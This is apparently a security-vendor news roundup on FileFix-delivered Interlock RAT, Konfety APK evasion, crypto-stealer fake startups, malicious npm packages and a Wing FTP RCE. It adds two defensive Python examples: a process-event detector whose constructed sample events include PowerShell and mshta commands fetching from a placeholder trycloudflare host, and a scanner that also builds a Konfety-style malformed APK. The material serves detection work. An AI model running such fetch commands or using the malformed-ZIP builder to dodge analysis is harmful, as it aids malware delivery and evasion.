---
title: "FileFix Ransomware Threat, Konfety Malware Evasion, Crypto Users Targeted, Cybersecurity News [July 14, 2025] | DuoCircle"
description: "FileFix Ransomware Threat, Konfety Malware Evasion, Crypto Users Targeted, Cybersecurity News [July 14."
image: "https://www.duocircle.com/images/og-default.png"
canonical: "https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-30-of-2025/"
---

Quick Answer

Cybersecurity headlines for the week of July 14, 2025. Interlock ransomware operators adopted the FileFix technique from researcher mr.d0x: victims paste a disguised PowerShell command into File Explorer's address bar, fetching a PHP RAT from trycloudflare.com that exfiltrates host data as JSON. Zimperium analyzed Konfety, an Android malware that hides inside a corrupted APK ZIP structure, falsely flags files as encrypted, and uses unsupported BZIP compression to crash analysis tools while Android still runs the app. Darktrace tracked a long-running crypto-stealing scheme using fake AI, gaming, and Web3 startup brands (BeeSync, Pollens AI, Swox) to deliver Atomic macOS Stealer (AMOS) and Windows malware via fake Cloudflare verification screens. Socket found 67 malicious npm packages dropping the XORIndex loader, tied to the North Korean Contagious Interview campaign. Attackers exploited CVE-2025-47812 in Wing FTP Server (a null-byte plus Lua injection bug, fixed in 7.4.4) within a day of disclosure.

FileFix Ransomware Threat, Konfety Malware Evasion, Crypto Users Targeted, Cybersecurity News \[July 14, 2025\]


[ Download episode](https://media.mailhop.org/duocircle/images/2025/07/FileFix-Ransomware-Threat-Konfety-Malware-Evasion-Crypto-Users-Targeted---Cybersecurity-News-July-14-2025.mp3) 


![cybersecurity news](https://media.mailhop.org/duocircle/images/2025/07/spf-record-tester-2341.jpg) 

Attackers are getting creative again, using copy-paste tricks to drop malware, hiding [Android threats](https://www.malwarebytes.com/blog/news/2025/06/android-threats-rise-sharply-with-mobile-malware-jumping-by-151-since-start-of-year) inside broken app files, and setting up entire fake startups to [steal crypto](https://www.bbc.com/news/articles/c80k5plpx8do). Developers are being targeted through tampered npm packages, while a newly exposed Wing FTP flaw is already under active abuse. With techniques evolving fast, staying patched and alert is more important than ever. Read on to **stay a step ahead**! 

Implementing [SPF](https://autospf.com/blog/spf-guide-understanding-sender-policy-framework/), [DKIM](/resources/what-is-dkim), [DMARC](/resources/what-is-dmarc), and strong [email security](/) is also key to defending against phishing and malware threats.

## Interlock Ransomware Introduces FileFix Tactic to Distribute Malware

Hackers behind Interlock ransomware are shifting tactics, using a new trick called “**FileFix**” to quietly plant remote access [trojans (RATs)](https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/) on victims’ systems. 

Researchers from [The DFIR Report and Proofpoint](https://thedfirreport.com/2025/07/14/kongtuke-filefix-leads-to-new-interlock-rat-variant/) have seen a rise in Interlock activity. Attackers first used the KongTuke web injector, luring victims through [fake CAPTCHA](https://www.trendmicro.com/en%5Fus/research/25/e/unmasking-fake-captcha-cases.html) checks and clipboard tricks that led users to **run PowerShell scripts** launching a Node.js-based RAT. In June, a PHP version appeared, delivered the same way. 

_However, the attackers recently switched to the FileFix method invented by security researcher mr.d0x, which lets them abuse trusted Windows features such as File Explorer and HTA applications_. Instead of clicking suspicious links, victims are tricked into pasting a disguised PowerShell command, posing as a file path, into the File Explorer address bar. This fetches the **PHP RAT from trycloudflare.com**, which then runs PowerShell commands to collect network and system data and exfiltrates it as JSON. 

[![system data ](https://media.mailhop.org/duocircle/images/2025/07/spf-record-tester-4211.jpg)](https://media.mailhop.org/duocircle/images/2025/07/spf-record-tester-4211.jpg)

The researchers have also spotted attackers probing Active Directory, hunting for backups, and moving laterally via RDP. For now, it is best to be cautious about copying or pasting commands from untrusted sources and to **keep security tools updated**. 
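The launch shape described above (File Explorer as the parent, PowerShell or an HTA host as the child, a URL on the command line) is what endpoint telemetry can key on. This is an added detection example over constructed process-creation events, not material from the DFIR Report or Proofpoint write-ups; the trycloudflare subdomain is a placeholder.

```python
"""Flag FileFix-style launches: Explorer spawning a script host whose command
line carries a URL. Added example over constructed Sysmon-style events."""
import re
from urllib.parse import urlparse

# Constructed process-creation records (Sysmon Event ID 1 style). The
# trycloudflare subdomain is a PLACEHOLDER, not an indicator from the article.
SAMPLE_EVENTS = [
    {"User": "CORP\\alice", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -c "Invoke-WebRequest https://PLACEHOLDER.trycloudflare.com/u"'},
    {"User": "CORP\\bob", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -File "C:\Scripts\backup.ps1"'},   # benign: user ran a script
    {"User": "CORP\\carol", "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe", "CommandLine": "pwsh.exe -NoLogo"},
    {"User": "CORP\\dave", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://PLACEHOLDER.trycloudflare.com/page.hta"},
]

# Children the article names: PowerShell and the HTA host, launched from Explorer.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
TUNNEL_SUFFIXES = (".trycloudflare.com",)   # free tunnelling service the RAT was fetched from


def _basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def filefix_findings(events):
    """Return one (user, child, url, severity) tuple per matching event.
    Explorer launching PowerShell on its own is routine (a user double-clicks
    a .ps1), so the URL on the command line is the condition that keeps noise
    down; a URL under a throwaway tunnel domain is escalated to high."""
    findings = []
    for ev in events:
        if _basename(ev["ParentImage"]) != "explorer.exe":
            continue
        child = _basename(ev["Image"])
        if child not in SCRIPT_HOSTS:
            continue
        match = URL_RE.search(ev["CommandLine"])
        if not match:
            continue
        host = (urlparse(match.group(0)).hostname or "").lower()
        severity = "high" if host.endswith(TUNNEL_SUFFIXES) else "medium"
        findings.append((ev["User"], child, match.group(0), severity))
    return findings
```

Running `filefix_findings(SAMPLE_EVENTS)` flags only the two events that reach out to a URL; the routine `backup.ps1` launch and the editor-spawned shell pass through.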

## Android Malware ‘Konfety’ Evades Detection Using Corrupted APK Files

A fresh wave of [Konfety Android malware](https://www.humansecurity.com/learn/blog/satori-threat-intelligence-alert-konfety-spreads-evil-twin-apps-for-multiple-fraud-schemes/) has surfaced, rigged with a corrupted ZIP structure and clever tricks to slip past security scans. 

It masquerades as **legitimate applications** that imitate familiar names on Google Play. Konfety offers no real functionality and bombards users with hidden ads through the CaramelAds SDK. _It then gathers details about installed apps and system settings and reroutes victims to shady sites or installs other unwanted apps_. [Zimperium’s researchers](https://zimperium.com/blog/konfety-returns-classic-mobile-threat-with-new-evasion-techniques) uncovered how the malware conceals its harmful code inside encrypted DEX files that are decrypted only at runtime, letting the attackers load new malicious components whenever they choose. 

Konfety also tampers with **APK internals**; it falsely marks files as encrypted to trigger [fake password prompts](https://www.bleepingcomputer.com/news/security/use-this-ai-chatbot-prompt-to-create-a-password-exclusion-list/), and labels crucial files with unsupported BZIP compression so popular analysis tools crash or fail to read them. Android, however, quietly ignores these tricks and lets the app run, helping the malware stay hidden. 

[![malware](https://media.mailhop.org/duocircle/images/2025/07/spf-record-4211.jpg)](https://media.mailhop.org/duocircle/images/2025/07/spf-record-4211.jpg)

_Beyond that, Konfety erases its icon and adjusts its behavior depending on the victim’s location_. The best course of action against this is not downloading anything from third-party app stores and sticking to trusted sources. 
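The two metadata tricks described above (an entry marked as encrypted, and an entry labelled with BZIP compression that Android does not support) live in the ZIP central directory, so a scanner that reads only that metadata and never decompresses anything stays usable on files that make full extractors give up. The following is an added example, not Zimperium's tooling; the APK is constructed inline with the same inconsistencies the article describes.

```python
"""Scan an APK's ZIP central directory for the metadata tricks the article
attributes to Konfety. Added example with a constructed sample APK."""
import io
import struct
import zipfile
import zlib

LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = 0x04034B50, 0x02014B50, 0x06054B50
CENTRAL_FMT, EOCD_FMT = "<IHHHHHHIIIHHHHHII", "<IHHHHIIH"   # 46 and 22 bytes
ENCRYPTED_FLAG = 0x0001                  # general-purpose bit 0
ANDROID_METHODS = {0: "stored", 8: "deflate"}   # the only methods an APK may use
BZIP2_METHOD = 12                        # what Konfety labels its key files with


def build_zip(entries):
    """Write a minimal ZIP from (name, raw_bytes, method, flags) tuples. The
    method and flag fields are written exactly as given, even when they lie
    about the payload, which is how the Konfety-style sample is produced."""
    body, central = bytearray(), bytearray()
    for name, data, method, flags in entries:
        nm, crc, off = name.encode(), zlib.crc32(data) & 0xFFFFFFFF, len(body)
        body += struct.pack("<IHHHHHIIIHH", LOCAL_SIG, 20, flags, method, 0, 0,
                            crc, len(data), len(data), len(nm), 0) + nm + data
        central += struct.pack(CENTRAL_FMT, CENTRAL_SIG, 20, 20, flags, method, 0, 0,
                               crc, len(data), len(data), len(nm), 0, 0, 0, 0, 0, off) + nm
    eocd = struct.pack(EOCD_FMT, EOCD_SIG, 0, 0, len(entries), len(entries),
                       len(central), len(body), 0)
    return bytes(body + central + eocd)


def konfety_like_sample():
    """Constructed sample: a normal manifest beside a classes.dex whose headers
    claim encryption and BZIP2 compression while the bytes are really stored."""
    return build_zip([("AndroidManifest.xml", b"<manifest/>", 0, 0),
                      ("classes.dex", b"dex\n035\x00" + b"\x00" * 16,
                       BZIP2_METHOD, ENCRYPTED_FLAG)])


def scan_apk(blob):
    """Walk the central directory by hand, never decompressing, and return one
    (entry, reason) finding per anomaly Android would tolerate but strict tools
    would not."""
    eocd_at = blob.rfind(struct.pack("<I", EOCD_SIG))
    if eocd_at < 0:
        raise ValueError("no end-of-central-directory record")
    count, _, cd_offset = struct.unpack_from(EOCD_FMT, blob, eocd_at)[4:7]
    findings, pos = [], cd_offset
    for _ in range(count):
        hdr = struct.unpack_from(CENTRAL_FMT, blob, pos)
        if hdr[0] != CENTRAL_SIG:
            raise ValueError(f"bad central directory header at offset {pos}")
        flags, method, nlen, xlen, clen = hdr[3], hdr[4], hdr[10], hdr[11], hdr[12]
        name = blob[pos + 46:pos + 46 + nlen].decode("utf-8", "replace")
        if flags & ENCRYPTED_FLAG:
            findings.append((name, "encryption flag set (Android never uses ZIP encryption for APK entries)"))
        if method not in ANDROID_METHODS:
            findings.append((name, f"compression method {method} is not stored or deflate"))
        pos += 46 + nlen + xlen + clen
    return findings


def strict_tool_result(blob, member="classes.dex"):
    """What a by-the-book extractor does with the same file: 'ok', or the name
    of the exception it raised, mirroring the analysis-tool failures noted above."""
    try:
        zipfile.ZipFile(io.BytesIO(blob)).read(member)
        return "ok"
    except Exception as exc:
        return type(exc).__name__
```

`scan_apk(konfety_like_sample())` reports both anomalies on `classes.dex`, while `strict_tool_result` shows the standard library refusing the same entry outright.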

## Bogus Gaming and AI Brands Target Crypto Users with Malware

**Cryptocurrency users** are being targeted in a long-running fraud where attackers pose as fake startups to push malware that steals digital assets on both Windows and macOS. 

These scams [involve social media profiles](https://www.darktrace.com/blog/crypto-wallets-continue-to-be-drained-in-elaborate-social-media-scam) of supposed AI, gaming, and Web3 enterprises that seem authentic, complete with blogs, team pages, and whitepapers. Attackers contact victims via **social media platforms**, offering small payments for trying out new software. Victims are then sent to professional-looking websites and prompted to download an app using a registration code. Scammers often exploit people’s desire to [earn crypto](https://earnpark.com/en/), making their offers seem like low-effort opportunities to gain digital assets quickly.

**On Windows**, this triggers a [fake Cloudflare screen](https://cyberpress.org/hackers-exploit-fake-cloudflare-verification-screens/) while malware installs in the background. On macOS, a disguised installer deploys [Atomic macOS Stealer (AMOS)](https://thehackernews.com/2025/06/new-atomic-macos-stealer-campaign.html), which can grab browser data, crypto wallet contents, and documents. Some variants even log user activity and set the malware to run at each login. _The campaign is still ongoing and using identities like BeeSync, Pollens AI, Swox, and others to lure users_. 

[![crypto wallet contents](https://media.mailhop.org/duocircle/images/2025/07/spf-record-check-4211.jpg)](https://media.mailhop.org/duocircle/images/2025/07/spf-record-check-4211.jpg)

Again, you should avoid downloading software from unknown sources, even if they look professional, and **be cautious of unsolicited offers** on social media or emails. 

## Threat Actors Conceal XORIndex Malware in 67 Malicious npm Packages

Threat actors have uploaded sixty-seven malicious packages to the [Node Package Manager (npm)](https://medium.com/@jesuva/node-package-managers-cab41450c2da) to deliver a **new malware loader** named XORIndex, aiming to compromise developer systems. 

[Researchers from Socket](https://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages) discovered these packages, which have been downloaded over 17,000 times and are linked to the **broader Contagious Interview campaign** that relies on [fake job offers](https://www.infosecurity-magazine.com/news/cybercriminals-fake-crowdstrike/) to lure developers. This operation has been [active for months](https://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages), with a previous wave in April involving 35 packages carrying information stealers and backdoors. In the latest attack, the threat actors used names resembling legitimate tools, like vite-meta-plugin and postcss-preloader, to blend in. 

[![FAKE JOB OFFERS](https://media.mailhop.org/duocircle/images/2025/07/hosted-email-server-9031.jpg)](https://media.mailhop.org/duocircle/images/2025/07/hosted-email-server-9031.jpg)

_When unsuspecting developers installed any of these packages, a ‘postinstall’ script silently launched XORIndex Loader, which gathered host data and sent it to a command-and-control server on Vercel infrastructure_. The server responded by deploying backdoors, including BeaverTail and InvisibleFerret, providing control over the infected machines. 

It is best to scrutinize package names carefully, **verify publisher reputations**, and test unfamiliar code in controlled environments before deploying it. 

## Hackers Exploit Remote Code Execution Vulnerability in Wing FTP Server

Hackers wasted no time exploiting a [severe flaw in Wing FTP Server](https://nvd.nist.gov/vuln/detail/CVE-2025-47812), striking just a day after technical details of the vulnerability were published. 

Security experts [have uncovered attacks](https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild) where intruders ran reconnaissance commands and created new user accounts to maintain access. [At the center is CVE-2025-47812](https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/), a high-risk bug mixing a null byte issue with Lua code injection, letting unauthenticated attackers execute **system-level commands**. Wing FTP, widely used in enterprises for secure file transfers, can run Lua scripts, an ability that now turns into a weakness. 

[![attackers](https://media.mailhop.org/duocircle/images/2025/07/sender-policy-framework-4211.jpg)](https://media.mailhop.org/duocircle/images/2025/07/sender-policy-framework-4211.jpg)

Researcher Julien Ahrens revealed that unsafe handling of null-terminated strings in **C++ and poor input sanitization** in Lua allowed attackers to slip null bytes into usernames, bypassing checks and injecting [malicious code](https://www.wiz.io/academy/malicious-code) into session files. _Alongside this flaw, Ahrens reported three more: password leaks via crafted URLs (CVE-2025-27889), lack of sandboxing (CVE-2025-47811), and path disclosures through oversized cookies (CVE-2025-47813)_. 

Although fixes landed in **version 7.4.4 in May**, [threat actors](https://thehackernews.com/2024/07/tag-100-new-threat-actor-uses-open.html) were seen sending malicious login requests and attempting to download payloads using certutil and cURL, suggesting coordinated scanning and exploitation. _Organizations should patch to 7.4.4 immediately or lock down web access and monitor servers closely to avoid compromise_.

## Topics

DKIM, DMARC, email security, News, Security, spf

![Brad Slavin](https://media.mailhop.org/dmarcreport/images/team/brad-slavin.jpg) 

Brad Slavin 

General Manager

General Manager at DuoCircle. Product strategy and commercial lead across the email security portfolio.


